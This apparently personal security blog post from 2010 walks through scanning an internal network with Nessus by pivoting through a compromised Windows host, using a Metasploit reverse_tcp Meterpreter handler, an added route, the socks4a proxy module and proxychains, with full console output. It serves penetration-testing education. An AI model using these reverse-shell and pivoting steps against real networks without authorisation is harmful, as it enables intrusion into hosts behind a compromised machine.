Nessus Through SOCKS Through Meterpreter

Sunday 24th Oct 10

Earlier this year Mark Baggett wrote an article on running a Nessus scan through Meterpreter. It involved installing an SSH server on the compromised machine and then using it as a SOCKS4 proxy to forward the scan traffic through to the target machine (Nessus Scanning through a Metasploit Meterpreter Session). It was a great idea but I don't like installing tools on clients machines if I can avoid it so never got round to doing it on a test.

Recently Zate Berg added the Nessus plug-in to Metasploit to let you control a Nessus server from the Metasploit command line. Without thinking it through my initial reaction was "Great I can now scan through a Meterpreter pivot". Once I thought about it and read Carlos's article New Nessus Plug-In For Metasploit I realised that the Nessus server was still running on the attacker machine and so didn't have access to the tunnel.

After asking a few questions on various mailing lists egypt pointed me at the auxiliary/server/socks4a module which would allow me to do the same as the SSH server but without having to install anything on the compromised machine. After a bit of playing, some partially successful scans and more questions to the list I got a completed scan through a Meterpreter pivot. The key seems to be that you need to be running at least Ruby 1.9 (I'm running 1.9.1) not 1.8.7 as I originally tried, withouth it the proxy seems to get congested and locks up.

Below is a walk through of the steps I went through to get the scan. The actors in this play are:

  • 192.168.0.2 - The attacking machine
  • 10.1.1.5 - The compromised machine
  • 10.1.1.2 - The machine I want to scan

There is no normal route from the 192 network into the 10 network, the router at 10.1.1.1 prevents this.

robin@attacker metasploit $ ./msfconsole

 ___________
< DigiNinja >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||



       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 613 exploits - 309 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10774 updated today (2010.10.21)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 31337
lport => 31337
msf exploit(handler) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.2:31337
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.80
[*] Meterpreter session 1 opened (192.168.0.2:31337 -> 192.168.0.80:24592) at 2010-10-22 10:38:18 +0100

msf exploit(handler) > route add 10.1.1.0 255.255.255.0 1
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server
msf auxiliary(socks4a) > 

Check the tunnel is working. I don't speak SMB but if you do this and see the OK then the connection has been made and you can just enter some rubbish and hit return a few times, the other end will drop the connection pretty quickly. Pick a port you know, or expect, to be open on the target machine, SMB is usually a good choice for a Windows box.

root@attacker sbin # proxychains nc 10.1.1.2 445
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK
dummy...  

Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.

socks4  127.0.0.1 1080

And now start Nessus

root@attacker sbin # proxychains ./nessus-service -D 

Scans take a LONG time, with a default Nessus policy it took me 4242 seconds to scan the compromised machine, that is nearly an hour and a quarter so I've created a minimal policy to work with for this type of scanning. First we load the nessus module the connect to it, check the policies and finally fire off a scan.

msf auxiliary(socks4a) > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf auxiliary(socks4a) > nessus_connect robin@localhost
[+] Password:
...
[*] Connecting to https://localhost:8834/ as robin
[*] Authenticated
msf auxiliary(socks4a) > nessus_policy_list
[+] Nessus Policy List

ID  Name        Comments
--  ----        --------
4   Minimal MS
3   noping
2   Web
1   All

msf auxiliary(socks4a) > nessus_scan_new 4 "Quick Windows" 10.1.1.2
[*] Creating scan from policy number 4, called "Quick Windows" and scanning 10.1.1.2
[*] Scan started.  uid is 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans

Scan ID                                               Name           Owner  Started            Status   Current Hosts  Total Hosts
-------                                               ----           -----  -------            ------   -------------  -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee  Quick Windows  robin  12:39 Oct 22 2010  running  0              1


[*] You can:
[+]             Import Nessus report to database :      nessus_report_get <reportid>
[+]             Pause a nessus scan :                   nessus_scan_pause <scanid>

Now sit back for a LONG wait. You can check the status with nessus_scan_status

msf auxiliary(socks4a) > nessus_scan_status
[+] Running Scans

Scan ID                                               Name           Owner  Started            Status   Current Hosts  Total Hosts
-------                                               ----           -----  -------            ------   -------------  -----------
60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee  Quick Windows  robin  12:39 Oct 22 2010  running  0              1

When it finall finishes you can check the results and load them into your Metasploit database

msf auxiliary(socks4a) > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file... 
[*] Successfully connected to the database
[*] File: msf.db                    

msf auxiliary(socks4a) >  nessus_report_get 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] importing 60625093-5e0c-74a0-bc04-a35f19ffa65adb108fa286291aee
[*] 10.1.1.2   Done!                                           
[+] Done
msf auxiliary(socks4a) > db_hosts 

Hosts
=====

address        address6  arch  comm  comments  created_at               info  mac                name                          os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at               svcs  vulns  workspace
-------        --------  ----  ----  --------  ----------               ----  ---                ----                          ---------  -------  -------  -----  -------  -----  ----------               ----  -----  ---------
10.1.1.2                                       2010-10-22 14:09:22 UTC        00:13:3b:04:03:52  CORP_DC                                                                    alive  2010-10-22 14:09:22 UTC  5     6      default

So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.

Recent Archive

Support The Site

I don't get paid for any of the projects on this site so if you'd like to support my work you can do so by using the affiliate links below where I either get account credits or cash back. Usually only pennies, but they all add up.